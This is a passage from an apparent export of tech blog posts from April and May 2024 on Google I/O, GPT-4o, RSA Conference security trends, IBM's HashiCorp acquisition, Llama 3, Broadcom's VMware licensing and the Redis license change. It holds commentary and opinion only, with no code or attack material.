million-token context window as Pro, which is a differentiator. If you need to process large documents quickly and cheaply — think summarization pipelines, classification at scale, or extraction from lengthy records — Flash with a huge context window is a compelling option.\nProject Astra and the Agent Future # Google showed Project Astra, a research prototype of a \u0026ldquo;universal AI agent\u0026rdquo; that can see through your phone camera, understand what it\u0026rsquo;s looking at, remember context from earlier in the conversation, and provide helpful responses in real time. The demo was impressive — the agent identified code on a screen, explained what a piece of hardware was, and remembered where the user had left their glasses.\nWhile Astra is a research preview, it signals where Google (and frankly, all major AI companies) are heading: persistent, multimodal AI agents that maintain context over extended interactions. The autonomous agent space was already getting heated, and Astra represents the frontier of this evolution. For developers, the implication is that we need to start thinking about how our applications and APIs will interact with these kinds of agents. If an AI agent can see a user\u0026rsquo;s screen and interact with web applications on their behalf, our UIs and APIs need to be agent-friendly — not just human-friendly.\nGoogle\u0026rsquo;s Developer Platform Consolidation # Beyond the AI headlines, Google is making notable infrastructure moves. Firebase is getting deeper Gemini integration, with AI-powered features for app development including automated crash analysis and performance recommendations. Vertex AI is positioning itself as the enterprise ML platform with new features for grounding model outputs in Google Search data and enterprise knowledge bases.\nThe strategic picture is clear: Google wants to be the default platform for AI-powered application development, from prototyping (AI Studio) through production (Vertex AI) with supporting infrastructure (Firebase, Cloud Run, GKE). It\u0026rsquo;s a full-stack play that mirrors what Microsoft is doing with Azure OpenAI Service and what AWS is doing with Bedrock.\nFor developers choosing a cloud platform, this consolidation creates both opportunity and lock-in risk. The integrated tooling is genuinely convenient — being able to go from AI Studio prototype to Vertex AI production deployment without changing your code is appealing. But the more deeply you integrate with platform-specific features, the harder it becomes to migrate if pricing or capabilities shift.\nMy Take # Google I/O 2024 showed a company that has fully committed to AI as its platform strategy. The Gemini models are competitive — the 1M token context window is a genuine differentiator, and Flash fills an important gap in the model lineup.\nBut I\u0026rsquo;d urge developers to look past the keynote spectacle and focus on the practical bits: the API improvements, the pricing, the context window capabilities. These are the things that actually affect your architecture decisions and your users\u0026rsquo; experience.\nThe million-token context window in particular is something I\u0026rsquo;d encourage every developer to experiment with. It unlocks use cases that simply weren\u0026rsquo;t possible before, and it changes how you think about document processing, code analysis, and knowledge retrieval. Even if you\u0026rsquo;re not building on Google\u0026rsquo;s platform, understanding what\u0026rsquo;s possible with this scale of context will inform your technical decisions regardless of which provider you ultimately choose.\nThe AI platform war is heating up, and developers are the beneficiaries. Competition is driving down prices, expanding capabilities, and creating more options than we\u0026rsquo;ve ever had. The challenge is no longer access to powerful AI — it\u0026rsquo;s figuring out what to build with it.\n","date":"16 May 2024","externalUrl":null,"permalink":"/posts/240516-google-io-2024-gemini-developer-tools/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google I/O 2024 was wall-to-wall Gemini. Beyond the AI hype, there are meaningful developer platform shifts worth paying attention to.","title":"Google I/O 2024 — Gemini Everywhere and the Developer Platform Play","type":"posts"},{"content":"OpenAI just held their Spring Update event and the headline is GPT-4o (the \u0026ldquo;o\u0026rdquo; stands for \u0026ldquo;omni\u0026rdquo;). It\u0026rsquo;s a new model that natively processes text, audio, and vision inputs and produces text, audio, and image outputs — all within a single neural network. If you\u0026rsquo;ve been building with the OpenAI API, this changes the game in several concrete ways. The GPT-4 Turbo announcements at DevDay had laid the groundwork for platform expansion, and GPT-4o represents the next evolution.\nWhat Makes GPT-4o Different # Previous iterations of OpenAI\u0026rsquo;s multimodal capabilities were essentially pipelines: audio went through Whisper for transcription, text went through GPT-4, and text-to-speech generated the audio response. GPT-4o collapses this into a single end-to-end model. The practical difference is substantial.\nResponse latency for audio drops from several seconds to as low as 232 milliseconds — essentially human conversational speed. The model can detect emotion in voice, modulate its own speaking style, and handle interruptions naturally. During the demo, the model sang, changed pacing on request, and reacted to visual input from a phone camera in real time.\nBut let\u0026rsquo;s set aside the impressive demo moments and focus on what matters for those of us building software. The key changes are:\nAPI-level: GPT-4o matches GPT-4 Turbo performance on text while being 2x faster and 50% cheaper. That alone is a significant practical improvement. The vision capabilities are substantially better, particularly for non-English text recognition. And the new audio capabilities will be available through a new API interface in the coming weeks.\nFree tier access: GPT-4o is rolling out to all ChatGPT users, including free tier. This is a strategic move that dramatically expands the user base for GPT-4-class capabilities. For developers building products, this means your users\u0026rsquo; expectations of what AI can do just jumped significantly. This democratization of capabilities echoes the impact the ChatGPT API release had on the developer community months earlier.\nRate limits and pricing: At half the cost of GPT-4 Turbo with better performance, the economics of building GPT-4-class features into applications just got much more favorable. For teams that had been using GPT-3.5 Turbo for cost reasons but wanting GPT-4 quality, GPT-4o might be the sweet spot.\nThe Multimodal API Opportunity # The real developer story here isn\u0026rsquo;t just \u0026ldquo;faster and cheaper GPT-4.\u0026rdquo; It\u0026rsquo;s the convergence of modalities in a single API call. Consider what becomes possible:\nAn application can now send a screenshot of a UI and ask the model to identify accessibility issues, generate test scripts, or suggest design improvements — with better vision understanding and at lower cost. A customer support system can process voice calls directly, understanding both the content and emotional tone, without a separate transcription step. A document processing pipeline can handle mixed-media documents (text, images, charts, handwriting) in a single pass.\nI\u0026rsquo;ve been prototyping with the GPT-4 Vision API since it launched, and the improvement in visual understanding is immediately noticeable. Charts and diagrams that GPT-4V would sometimes misinterpret are handled correctly by GPT-4o. Code in screenshots is transcribed more accurately. And the speed improvement makes interactive use cases — where a user is pointing a camera at something and expecting real-time feedback — actually viable.\nThe Competitive Landscape Shifts # GPT-4o doesn\u0026rsquo;t exist in a vacuum. Google\u0026rsquo;s Gemini models have been multimodal from the start, and Anthropic\u0026rsquo;s Claude 3 family launched with strong vision capabilities just two months ago. What OpenAI has done is combine state-of-the-art quality across all modalities with aggressive pricing that puts pressure on everyone. The foundation laid by GPT-4\u0026rsquo;s initial release continues to shape the trajectory of the entire industry.\nThe pricing war is worth watching. When GPT-4 launched a year ago, the cost per token was a genuine barrier for many applications. Now GPT-4o offers equivalent quality at prices that are approaching where GPT-3.5 Turbo was. This compression of the cost curve is accelerating adoption in ways that raw capability improvements alone wouldn\u0026rsquo;t achieve.\nFor developers building on these APIs, the multi-provider strategy is becoming increasingly important. The performance gap between top models from OpenAI, Anthropic, and Google is narrowing, while pricing and availability fluctuate. Abstracting your LLM calls behind a common interface — whether that\u0026rsquo;s LangChain, LiteLLM, or a homegrown abstraction — is practical engineering hygiene at this point.\nImplications for Voice-First Applications # The audio capabilities of GPT-4o deserve special attention. Real-time voice interaction with sub-250ms latency and emotional awareness is a threshold moment for voice-first applications. Previous voice assistants (including those built on OpenAI\u0026rsquo;s APIs) had a noticeable lag that made conversations feel stilted. GPT-4o eliminates that.\nI expect we\u0026rsquo;ll see a wave of voice-first applications in domains where hands-free interaction is valuable: field service, healthcare documentation, accessibility tools, and developer workflows (imagine pair programming with a voice-interactive AI that can see your screen). The technology is now fast enough and natural enough that the limiting factor shifts from \u0026ldquo;can we do this?\u0026rdquo; to \u0026ldquo;should we, and how do we design the UX?\u0026rdquo;\nMy Take # GPT-4o is less of a revolutionary breakthrough and more of an engineering tour de force — taking capabilities that existed in separate systems and unifying them into a single, faster, cheaper model. But in practical terms, that unification is what enables new categories of applications.\nMy advice for developers: update your cost models. If you\u0026rsquo;ve been holding back on GPT-4-class features because of API costs, revisit those calculations with GPT-4o pricing. Start experimenting with the multimodal capabilities, especially vision — the quality improvement is worth exploring even if you don\u0026rsquo;t have an immediate use case. And when the audio API launches, prototype quickly. The first wave of genuinely conversational AI applications is about to arrive, and being early matters.\nWe\u0026rsquo;re in a period where the major AI labs are competing on price, speed, and multimodal breadth simultaneously. As developers, this is an excellent position to be in. The tools are getting better and cheaper at a pace that\u0026rsquo;s hard to keep up with — but trying to keep up is absolutely worth the effort. The trajectory from the ChatGPT API\u0026rsquo;s early enablement through GPT-4\u0026rsquo;s refinement to GPT-4o\u0026rsquo;s multimodal maturity shows an acceleration that\u0026rsquo;s reshaping what\u0026rsquo;s possible for AI-powered applications.\n","date":"9 May 2024","externalUrl":null,"permalink":"/posts/240509-openai-gpt4o-multimodal/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s Spring Update reveals GPT-4o, a natively multimodal model that processes text, audio, and vision in a single architecture. The developer implications are significant.","title":"GPT-4o — OpenAI's Multimodal Leap and What It Means for Developers","type":"posts"},{"content":"RSA Conference 2024 is underway in San Francisco this week, and if you thought last year\u0026rsquo;s event was AI-heavy, this year makes that look restrained. Walking through the expo floor (virtually — I\u0026rsquo;m following along from the Netherlands), it seems like every vendor has bolted \u0026ldquo;AI-powered\u0026rdquo; onto their product descriptions. But beneath the marketing noise, there are genuine shifts happening in how we think about security in an AI-saturated world.\nThe Two Sides of AI in Security # The conversation at RSAC this year breaks neatly into two tracks: using AI to defend, and defending against AI. Both are maturing rapidly, but at very different rates.\nOn the defensive side, AI-powered threat detection has moved well past the \u0026ldquo;anomaly detection\u0026rdquo; buzzword phase. Companies like CrowdStrike and Palo Alto Networks are demonstrating systems that can correlate signals across endpoints, network traffic, and cloud workloads in ways that would take human analysts hours or days. The CrowdStrike Charlotte AI assistant, for instance, lets security analysts query their threat data in natural language — think \u0026ldquo;show me all lateral movement attempts in the last 48 hours involving service accounts\u0026rdquo; — and get actionable results.\nHaving spent years dealing with SIEM alert fatigue, I can tell you this kind of capability is genuinely transformative. The bottleneck in security operations has never been data collection; it\u0026rsquo;s been making sense of the data fast enough to act on it. Large language models are remarkably good at this translation layer between raw telemetry and human decision-making.\nOn the offensive side, the picture is more sobering. AI-generated phishing emails are already measurably more effective than traditional ones. Deepfake audio is being used in business email compromise attacks — or rather, business voice compromise attacks. And the barrier to entry for creating sophisticated attack tools continues to drop. A talk at this year\u0026rsquo;s conference demonstrated how an attacker with moderate skills could use publicly available LLMs to generate polymorphic malware that evades traditional signature-based detection.\nThe Software Supply Chain Keeps Everyone Up at Night # If there\u0026rsquo;s one topic that rivals AI for floor time at RSAC 2024, it\u0026rsquo;s software supply chain security. The echoes of SolarWinds, Log4j, and the recent xz Utils backdoor discovery are still reverberating through the industry.\nThe xz Utils incident, which came to light just a few weeks ago, is particularly chilling because it wasn\u0026rsquo;t a vulnerability in the traditional sense — it was a deliberate, patient, multi-year social engineering campaign to compromise a critical open-source library maintainer and insert a backdoor. It\u0026rsquo;s the kind of attack that makes you question every dependency in your stack.\nSeveral RSAC sessions are focused on practical responses: improving SBOM (Software Bill of Materials) tooling, implementing more rigorous code signing practices, and establishing better processes for vetting open-source contributors. CISA\u0026rsquo;s continued push for Secure by Design principles is getting strong representation, and there\u0026rsquo;s growing momentum around making software manufacturers accountable for the security of their products.\nZero Trust Is Finally Just \u0026ldquo;Security\u0026rdquo; # I\u0026rsquo;ve been following the zero trust conversation for the better part of a decade, and this might be the first year at RSAC where it doesn\u0026rsquo;t feel like a marketing category anymore. It\u0026rsquo;s just\u0026hellip; how you do security now. The perimeter is dead. Identity is the new perimeter. Every request is verified. These aren\u0026rsquo;t revolutionary statements anymore; they\u0026rsquo;re baseline assumptions.\nWhat\u0026rsquo;s more interesting is the implementation maturity. Companies are moving beyond \u0026ldquo;we deployed a zero trust network access (ZTNA) product\u0026rdquo; to genuinely rethinking their security architectures around continuous verification. The integration between identity providers, device trust signals, and application-level authorization is getting more seamless, and frameworks like NIST SP 800-207 are being adopted as practical blueprints rather than aspirational documents.\nThe Talent Gap Hasn\u0026rsquo;t Closed # Despite all the AI automation talk, the cybersecurity talent shortage remains acute. ISC2\u0026rsquo;s latest estimates put the global shortage at around 4 million professionals. The irony isn\u0026rsquo;t lost on anyone: we\u0026rsquo;re building AI tools to augment security teams partly because we can\u0026rsquo;t hire enough humans to do the work.\nSeveral RSAC sessions address this through the lens of upskilling — using AI not just as a force multiplier for existing analysts, but as a training tool for junior staff. The idea of an AI copilot that explains its reasoning, teaches analysts about attack patterns, and helps them develop intuition faster is compelling. Whether it works in practice remains to be seen, but the intent is sound.\nMy Take # RSAC is always a mix of genuine insight and vendor theater, and 2024 is no exception. But if I had to distill the meaningful signal from this year\u0026rsquo;s conference, it would be this: the security industry is finally grappling with AI as a dual-use technology in a serious way.\nThe organizations that will fare best are the ones that invest in AI-powered defenses while simultaneously hardening their systems against AI-powered attacks. That means red-teaming your defenses against AI-generated threats, treating your software supply chain as a first-class security domain, and accepting that the threat landscape is evolving faster than any single product can address.\nFor practitioners, my takeaway is practical: if you haven\u0026rsquo;t looked at your supply chain security posture since the xz Utils incident, now is the time. Update your threat models to include AI-generated social engineering. And if your organization is still treating zero trust as a future initiative rather than a current priority, you\u0026rsquo;re behind.\nThe adversaries are already using AI. The question isn\u0026rsquo;t whether we should too — it\u0026rsquo;s whether we can do it thoughtfully enough to stay ahead.\n","date":"2 May 2024","externalUrl":null,"permalink":"/posts/240502-rsa-conference-2024-ai-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"RSA Conference 2024 kicks off in San Francisco with AI dominating every conversation. But beneath the marketing buzz, there are real security challenges emerging that practitioners need to face.","title":"RSA Conference 2024 — AI Meets Cybersecurity, For Better and Worse","type":"posts"},{"content":"Yesterday, IBM announced it would acquire HashiCorp for approximately $6.4 billion in cash, at $35 per share. If you\u0026rsquo;ve been working in cloud infrastructure for the past decade, this news probably hit you somewhere between \u0026ldquo;inevitable\u0026rdquo; and \u0026ldquo;deeply concerning.\u0026rdquo; HashiCorp\u0026rsquo;s tools — Terraform, Vault, Consul, Nomad — are embedded in the infrastructure workflows of thousands of organizations. This acquisition reshapes the landscape in ways we need to think carefully about.\nThe Deal in Context # IBM has been on an acquisition spree that started accelerating after spinning off its managed infrastructure business as Kyndryl in 2021. The Red Hat acquisition in 2019 for $34 billion was the flagship move, and HashiCorp fits neatly into that hybrid cloud strategy. Arvind Krishna\u0026rsquo;s IBM is betting heavily on becoming the enterprise platform for multi-cloud management, and HashiCorp\u0026rsquo;s tools are the connective tissue that makes multi-cloud work.\nThe $6.4 billion price tag is notable — HashiCorp\u0026rsquo;s stock had been struggling since its IPO in late 2021, dropping from highs near $100 to the low $20s before the acquisition premium. For shareholders, this is a lifeline. For the community, it\u0026rsquo;s a question mark.\nThe Terraform Elephant in the Room # Let\u0026rsquo;s address what everyone\u0026rsquo;s thinking about: Terraform. It\u0026rsquo;s the de facto standard for infrastructure-as-code, used by teams ranging from two-person startups to Fortune 100 enterprises. But the relationship between HashiCorp and its open-source community has already been strained.\nLast August, HashiCorp switched Terraform\u0026rsquo;s license from the Mozilla Public License to the Business Source License (BSL), a move that triggered the creation of OpenTofu — a community fork under the Linux Foundation. That license change was widely seen as HashiCorp preparing for exactly this kind of exit: making the company more attractive to acquirers by protecting revenue streams from competing managed services.\nNow, with IBM at the helm, the question becomes: will IBM double down on the BSL approach, or will they find a way to mend fences with the community? IBM has historically been a strong contributor to open source — their stewardship of Red Hat and involvement in projects like Eclipse and the Linux kernel suggests they understand the value of community goodwill. But understanding it and acting on it are different things.\nWhat This Means for Your Stack # If you\u0026rsquo;re running Terraform in production (and statistically, many of you are), the immediate impact is minimal. IBM has said HashiCorp will operate as a division within IBM Software, and there\u0026rsquo;s no indication of sudden product changes. But I\u0026rsquo;d encourage teams to think about this on a longer timeline.\nIn my experience with large enterprise acquisitions, the first 12-18 months are usually stable. The acquiring company wants to retain customers and talent. It\u0026rsquo;s year two and beyond where you start seeing the integration tax — products get folded into enterprise bundles, pricing models shift, and the standalone product roadmap starts bending toward the parent company\u0026rsquo;s strategic priorities.\nFor Vault users, this could actually be positive. IBM has deep enterprise security relationships, and Vault\u0026rsquo;s secrets management capabilities could get significantly more investment. Consul and Nomad, however, are harder to predict. Consul overlaps somewhat with Red Hat\u0026rsquo;s service mesh story, and Nomad has always lived in Kubernetes\u0026rsquo; shadow.\nThe Broader Consolidation Pattern # This acquisition is part of a pattern that\u0026rsquo;s been accelerating in the infrastructure tooling space. Broadcom acquired VMware. Cisco bought Splunk. Now IBM gets HashiCorp. The independent infrastructure software company is becoming an endangered species.\nFor those of us who\u0026rsquo;ve been building on these tools for years, the pattern is familiar and frustrating. You invest in learning a tool, build your workflows around it, advocate for it within your organization — and then it gets absorbed into an enterprise conglomerate where your voice as a practitioner matters less than the enterprise sales motion.\nThe silver lining, if there is one, is that this consolidation is creating real demand for genuinely open alternatives. OpenTofu is gaining traction. Pulumi offers a different approach to IaC. Crossplane is building a Kubernetes-native infrastructure management layer. The ecosystem is more diverse than it was five years ago, even as the big players consolidate.\nMy Take # I\u0026rsquo;ve been using HashiCorp tools since the early Vagrant days, and I\u0026rsquo;ve watched the company evolve from a scrappy open-source shop to an enterprise-focused business. The IBM acquisition feels like the final chapter of that transformation.\nMy practical advice: don\u0026rsquo;t panic-migrate off Terraform tomorrow. But do invest time in understanding OpenTofu and other alternatives. Make sure your Terraform modules are written in a way that\u0026rsquo;s portable. And if you\u0026rsquo;re making new infrastructure decisions, weigh the long-term governance risk alongside the technical merits.\nThe infrastructure-as-code space is mature enough now that no single vendor should be a single point of failure in your strategy. IBM acquiring HashiCorp is a reminder that in enterprise software, the only constant is change — and the best defense is keeping your options open.\nThis is a developing story, and I\u0026rsquo;ll be watching closely as the deal moves through regulatory approval in the coming months.\n","date":"25 April 2024","externalUrl":null,"permalink":"/posts/240425-ibm-hashicorp-acquisition/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"IBM’s $6.4 billion acquisition of HashiCorp signals a major consolidation in the cloud infrastructure space. Here’s what it means for Terraform users and the broader IaC community.","title":"IBM Acquires HashiCorp — What It Means for the Infrastructure-as-Code Ecosystem","type":"posts"},{"content":"Meta just released Llama 3, and the benchmarks are turning heads. The new models — available in 8B and 70B parameter variants — are posting scores that put them at or near the top of their respective weight classes across virtually every standard evaluation. The 8B model outperforms the previous Llama 2 70B on several benchmarks, which is remarkable when you think about the efficiency gain that represents. And a 400B+ parameter model is reportedly still in training. If the scaling trend holds, that one could challenge GPT-4 class models.\nI\u0026rsquo;ve been following the open-weight AI model space closely since the original Llama leak in early 2023, and Llama 3 feels like a genuine inflection point. This isn\u0026rsquo;t incremental improvement — it\u0026rsquo;s a step change. The journey from GPT-3\u0026rsquo;s introduction through GPT-4\u0026rsquo;s capabilities has shown the industry what frontier models can do, and now Meta is bringing similar power to open weights.\nWhat\u0026rsquo;s Under the Hood # Meta\u0026rsquo;s announcement reveals some interesting architectural and training decisions. Llama 3 sticks with the decoder-only transformer architecture — no surprise there — but makes several important changes from Llama 2:\nTokenizer upgrade: A new 128K token vocabulary (up from 32K in Llama 2) using tiktoken. Larger vocabularies mean better text compression, which means the model can process more information within its context window. This alone is a meaningful improvement for multilingual and code-heavy use cases.\nGrouped Query Attention (GQA) is now used across all model sizes, not just the larger variants. This architectural choice improves inference efficiency — a practical consideration that matters enormously when you\u0026rsquo;re deploying these models at scale.\nTraining data: 15 trillion tokens — roughly 7x the Llama 2 training set. Meta reports extensive data filtering and quality curation pipelines, including using Llama 2 itself as a classifier for data quality. The training data cutoff matters here: this is current enough to include recent events and technical developments.\nContext length: 8,192 tokens as the base context window. Not the longest in the market (Claude offers 200K, GPT-4 Turbo offers 128K), but respectable and sufficient for many practical applications.\nThe 70B model\u0026rsquo;s benchmark results are particularly impressive. It\u0026rsquo;s competitive with Claude 3 Sonnet and approaches GPT-4\u0026rsquo;s performance on several tasks, while being freely downloadable and runnable on your own infrastructure. The 8B model, meanwhile, is small enough to run on a single consumer GPU with quantization — opening up local LLM deployment to a much wider audience.\nThe Open-Weight Advantage # I want to be precise about terminology here. Meta calls Llama 3 \u0026ldquo;open source,\u0026rdquo; but purists will (correctly) note that the license has restrictions. You can\u0026rsquo;t use Llama 3 to train other models. Applications with over 700 million monthly active users need a special license. It\u0026rsquo;s \u0026ldquo;open weights\u0026rdquo; more than \u0026ldquo;open source\u0026rdquo; in the traditional sense.\nThat said, for the vast majority of developers and organizations, the practical benefit is enormous. You can download the model weights, run them locally, fine-tune them on your data, deploy them in your products, and inspect every layer of the network. Try doing that with GPT-4.\nThe implications for enterprise adoption are significant. I\u0026rsquo;ve worked with several organizations that are interested in LLM capabilities but have legitimate concerns about sending proprietary data to third-party APIs. Data residency requirements, industry regulations, competitive sensitivity — there are many valid reasons to want your AI model running on your own infrastructure. Llama 3 makes that feasible at a quality level that was previously only available through API calls to OpenAI or Anthropic.\nThe Ecosystem Effect # What excites me most about Llama 3 isn\u0026rsquo;t the model itself — it\u0026rsquo;s what the ecosystem will build on top of it. Within hours of the release, the open source community had quantized versions running on consumer hardware via llama.cpp, integrated it into Ollama for easy local deployment, and started fine-tuning experiments.\nThis is the flywheel effect that Meta is betting on. By releasing capable base models, they create an ecosystem of fine-tuned variants, tooling, and applications that collectively advance the state of open AI development. We saw this with Llama 2 — the explosion of fine-tuned models on Hugging Face, the development of efficient inference tools, the emergence of local-first AI applications — and Llama 3 is going to supercharge it.\nMeta also announced that Llama 3 is being integrated into Meta AI across Facebook, Instagram, WhatsApp, and Messenger, powered by a new meta.ai web experience. They\u0026rsquo;re eating their own cooking, which is always a good sign.\nThe Competitive Landscape Shifts # The release of Llama 3 puts pressure on every player in the AI model space. For closed-source providers like OpenAI and Anthropic, the gap between their proprietary models and the best open-weight alternatives just narrowed significantly. The 400B+ model still in training could narrow it further.\nFor other open-weight model providers — Mistral, Cohere, and others — Llama 3 raises the bar dramatically. Mistral\u0026rsquo;s models were the previous benchmark for open-weight performance, and Llama 3 70B surpasses them on most benchmarks.\nGoogle\u0026rsquo;s position is interesting. They have the compute, the data, and the research talent to compete at every level, but their open model releases (Gemma) haven\u0026rsquo;t matched the impact of Llama. With Llama 3 raising expectations, Google will need to respond.\nMy Take # I\u0026rsquo;ve been cautiously optimistic about the trajectory of open-weight AI models, and Llama 3 validates that optimism. We\u0026rsquo;re reaching a point where the best freely available models are genuinely useful for production applications, not just research experiments.\nBut I want to temper the excitement with some pragmatism. Model quality is necessary but not sufficient. The real challenges in deploying AI in production are still data quality, evaluation methodology, safety guardrails, and operational reliability. A better base model makes all of those easier but doesn\u0026rsquo;t solve them.\nFor developers looking to get started with Llama 3, my recommendation is simple: download the 8B model, run it locally with Ollama, and start experimenting. Understanding how these models behave — their strengths, their failure modes, their quirks — is becoming essential engineering knowledge. The shift toward open-weight models represents a fundamental change in how the AI ecosystem is developing.\nWe\u0026rsquo;re watching the AI capability curve go open in real time. Whether that turns out to be a democratizing force or creates new problems we haven\u0026rsquo;t anticipated is a question I can\u0026rsquo;t answer today. But I\u0026rsquo;d rather have this technology widely available and well-understood than locked behind API paywalls. Meta, whatever you think of their broader business, is doing something genuinely valuable here.\n","date":"18 April 2024","externalUrl":null,"permalink":"/posts/240418-meta-llama-3-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Meta’s Llama 3 arrives with 8B and 70B parameter models that rival closed-source competitors, reshaping the open-weight AI landscape.","title":"Meta Releases Llama 3 — Open Source AI Just Got Serious","type":"posts"},{"content":"It\u0026rsquo;s been about four months since Broadcom officially closed its $69 billion acquisition of VMware, and the fallout is becoming impossible to ignore. Perpetual licenses? Gone. The sprawling product portfolio? Consolidated down to two main bundles — VMware Cloud Foundation (VCF) and VMware vSphere Foundation (VVF). Partner programs? Gutted. And the pricing? Let\u0026rsquo;s just say the forums and Reddit threads are full of infrastructure teams in various stages of grief.\nI\u0026rsquo;ve managed VMware environments on and off since the ESX 3.x days, and I\u0026rsquo;ve never seen this level of anxiety in the virtualization community. Broadcom is executing the exact playbook everyone feared when the acquisition was announced, and it\u0026rsquo;s happening faster than most predicted.\nThe Licensing Earthquake # Let me lay out the key changes that are driving everyone crazy:\nPerpetual licenses are dead. Broadcom has moved everything to subscription-only licensing. If you bought VMware perpetual licenses — some organizations invested millions — you can keep running your current versions, but you won\u0026rsquo;t receive updates, patches, or support once your existing support contracts expire. Broadcom isn\u0026rsquo;t renewing support on perpetual licenses. This is a forced migration to subscriptions, full stop.\nThe portfolio consolidation eliminated standalone products that many organizations relied on. vSphere Standard, the entry-level hypervisor that smaller shops used? Gone. You now need vSphere Foundation at minimum, which bundles in vCenter, Aria operations suite, and Tanzu. VMware Cloud Foundation bundles everything including NSX networking and vSAN storage. There\u0026rsquo;s no à la carte option anymore.\nPricing is\u0026hellip; opaque. Broadcom hasn\u0026rsquo;t published clear public pricing, pushing everything through partner channels. But reports from the field are consistent: many customers are seeing price increases of 2x to 10x compared to their previous agreements. Per-core licensing has replaced per-socket licensing, which particularly hurts organizations running high-core-count processors — essentially everyone who bought modern AMD EPYC or Intel Xeon servers.\nThe Channel Partner Apocalypse # Perhaps even more disruptive than the licensing changes is Broadcom\u0026rsquo;s decimation of the VMware partner ecosystem. Thousands of partners have been dropped from the program, with Broadcom consolidating sales through a much smaller number of \u0026ldquo;preferred\u0026rdquo; partners. For many mid-market companies that relied on their local VMware partner for procurement, support, and implementation, this is a practical disaster.\nI\u0026rsquo;ve talked to several colleagues running infrastructure at mid-sized companies, and the story is the same: their existing VMware partner can no longer sell them licenses, the new assigned partner doesn\u0026rsquo;t know their environment, and getting a straight answer on pricing requires escalation after escalation. It\u0026rsquo;s the kind of customer experience that drives migrations.\nThe Great Virtualization Migration Begins # And migrate they are. I\u0026rsquo;m seeing more serious evaluation of VMware alternatives than at any point in the last fifteen years:\nProxmox VE is having a moment. This Debian-based virtualization platform has been around since 2008 but was always seen as a \u0026ldquo;homelab\u0026rdquo; or SMB solution. The recent flood of VMware refugees is changing that perception rapidly. It supports KVM virtual machines and LXC containers, has a decent web interface, and — critically — is open source with optional paid support subscriptions that cost a fraction of VMware pricing.\nNutanix AHV is aggressively courting VMware customers, offering migration tools and competitive pricing. For organizations that are already Nutanix HCI customers using VMware as their hypervisor, the switch to the included AHV hypervisor eliminates the VMware cost entirely.\nMicrosoft Hyper-V remains an option, though Microsoft\u0026rsquo;s own recent moves (removing Hyper-V Server as a free standalone product) have dampened enthusiasm somewhat. For Windows-heavy shops already licensed for Windows Server Datacenter, it\u0026rsquo;s still a reasonable path.\nOpenStack and KVM for larger organizations willing to invest in operational complexity for long-term control. Several European cloud providers have run on OpenStack for years and proven it can work at scale.\nThe Broader Lesson: Vendor Lock-in Has a Price # What\u0026rsquo;s happening with VMware is the most vivid illustration of vendor lock-in risk I\u0026rsquo;ve seen in my career. Organizations that built their entire infrastructure on vSphere — using vSAN for storage, NSX for networking, vRealize for management — are now discovering that deep integration with a single vendor\u0026rsquo;s ecosystem comes with a steep exit cost. The deeper you went, the harder it is to leave, and the more pricing leverage the vendor has.\nI\u0026rsquo;ve been preaching infrastructure diversification for years, and I realize that\u0026rsquo;s easy to say and hard to do. VMware earned its dominant position because the product was genuinely excellent, the ecosystem was mature, and the operational model was well-understood. But \u0026ldquo;excellent product\u0026rdquo; and \u0026ldquo;safe long-term bet\u0026rdquo; are different things, and Broadcom just proved it.\nFor organizations starting new infrastructure projects today, I\u0026rsquo;d strongly recommend evaluating open source virtualization platforms and building operational expertise in KVM-based solutions. Not because they\u0026rsquo;re better than VMware in every dimension — they\u0026rsquo;re not — but because reducing dependency on any single vendor\u0026rsquo;s licensing decisions is a strategic imperative that this situation has made painfully clear.\nMy Take # Broadcom is doing exactly what Broadcom does. They\u0026rsquo;ve done it with Symantec, CA Technologies, and now VMware. They acquire companies with large installed bases and loyal customers, then optimize aggressively for profit extraction. It\u0026rsquo;s a legitimate business strategy, and the stock market rewards it. But it\u0026rsquo;s corrosive to the technology ecosystem and deeply frustrating for the engineers and organizations caught in the gears.\nIf you\u0026rsquo;re a VMware shop, my advice is simple: start your evaluation of alternatives now, even if you\u0026rsquo;re not ready to migrate. Understanding your options takes time, and you don\u0026rsquo;t want to be making that assessment under duress when your renewal comes up at 5x the previous price. The VMware that existed six months ago — the partner-friendly, ecosystem-building, innovation-driven VMware — isn\u0026rsquo;t coming back.\n","date":"11 April 2024","externalUrl":null,"permalink":"/posts/240411-broadcom-vmware-licensing-shakeup/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Broadcom’s aggressive restructuring of VMware’s licensing and product portfolio is forcing organizations to rethink their virtualization strategies.","title":"Broadcom's VMware Overhaul — The Virtualization World Is Rattled","type":"posts"},{"content":"Redis, the beloved in-memory data store that\u0026rsquo;s become as ubiquitous as oxygen in modern application stacks, just dropped a bombshell. As of March 20, all future versions of Redis will be released under a dual license — the Server Side Public License (SSPL) and Redis Source Available License v2 (RSALv2) — instead of the three-clause BSD license that made it one of the most permissively licensed pieces of infrastructure software in existence. And the community\u0026rsquo;s response has been swift: the Linux Foundation is backing a fork called Valkey, and the open source ecosystem is bracing for another licensing war.\nI\u0026rsquo;ve watched this movie before. Multiple times. And the sequel is never better than the original. Elasticsearch went through a similar transformation, switching from open source to a proprietary dual-license model, and the community response followed a predictable pattern.\nWhat Actually Changed # Let me be precise about what happened because the details matter. Redis Labs (now just \u0026ldquo;Redis\u0026rdquo;) changed the license for the Redis server itself. Previously, Redis core was BSD-licensed — you could use it, modify it, redistribute it, embed it in proprietary products, host it as a service, literally anything. The new SSPL/RSALv2 dual license restricts one specific use case: offering Redis as a managed service without contributing back or obtaining a commercial license.\nThe target is obvious. AWS ElastiCache, Google Cloud Memorystore, Azure Cache for Redis — these hyperscalers have built billion-dollar businesses running Redis-compatible services without contributing meaningfully to Redis development (from Redis Labs\u0026rsquo; perspective, anyway). The SSPL, originally created by MongoDB, essentially says: \u0026ldquo;if you offer this software as a service, you must open-source your entire service stack.\u0026rdquo; It\u0026rsquo;s a poison pill for cloud providers.\nRedis CEO Rowan Trollope\u0026rsquo;s blog post frames this as a sustainability move, and I understand the business logic. Redis Labs has raised hundreds of millions in venture capital and needs a path to revenue that doesn\u0026rsquo;t involve competing against the very companies using its open source project as a loss leader.\nEnter Valkey # Within days of the announcement, the Linux Foundation announced Valkey — a community-driven fork of Redis 7.2.4 (the last BSD-licensed version), backed by AWS, Google Cloud, Oracle, 